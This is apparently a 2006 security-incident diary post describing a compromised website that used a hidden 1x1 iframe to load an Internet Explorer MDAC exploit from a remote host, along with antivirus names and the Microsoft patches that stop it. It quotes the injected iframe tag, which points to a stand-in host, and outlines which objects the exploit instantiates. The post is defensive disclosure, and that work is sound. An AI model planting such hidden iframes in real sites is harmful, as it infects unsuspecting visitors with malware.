Hidden IFrame Remains Popular With Browse-By Exploit Authors

Published: 2006-06-04
Last Updated: 2006-06-05 12:16:39 UTC
by Lenny Zeltser (Version: 1)
0 comment(s)
ISC reader Glenn Jarvis wrote in to tell us about a website that installs a malicious executable in the temporary folder of the victim's system. A look at the source code of the website's top page revealed a tiny IFrame tag that retrieved another page from a remote server. The size of the in-line frame is 1 pixel by 1 pixel, so it is not visible to the visitor of the site unless the person looks at the source code:

<iframe src= http://remote.example.com/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe><html>

The remote server's index.html file contained JavaScript code that attempted to exploit a recent Internet Explorer vulnerability to download, install, and run a malicious executable on the website visitor's computer. The executable was recognized by about half of anti-virus tools as a spyware trojan, and was assigned names such as Downloader-ASQ, TR/Spy.Small.EE.2, Win32/SillyDL.2fy, Trojan.Spy.Win32.Small, and Downloader.

The exploit itself targeted a vulnerability that was patched in the update to Internet Explorer that Microsoft released on April 11, 2006. Microsoft Security Bulletin MS06-014 briefly describes the problem:

Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)

A remote code execution vulnerability exists in the RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker who successfully exploited this vulnerability could take complete control of an affected system.

Cumulative Security Update for Internet Explorer (912812), which was also released on April 11th, according to Microsoft Security Bulletin MS06-013, strengthens security settings for the Internet zone on Internet Explorer. These settings render the exploit ineffective even if the potential victim did not apply the 911562 patch referenced above. The cumulative update sets the following settings to Disable:
  • Initialize and script ActiveX controls not marked as safe for scripting
  • Access data sources across domains
The exploit we observed operates by instantiating a series of objects, including Microsoft.XMLHTTP, Adodb.Stream, and WScript.Shell. When looking for correlating activities related to this exploit, we came across web forum discussions that suggest that this exploited existed as early as April 26th, two weeks after the release of Microsoft's patch.

Hidden IFrame elements continue to be a popular way for targeting website visitors. After breaking into a server, the attacker modifies its HTML code, using a hidden IFrame tag to retrieve exploit code from another system. Maintainers of the compromised website typically don't know that they are infecting their visitors for quite some time.

Lenny Zeltser
ISC Handler on Duty

0 comment(s)


Diary Archives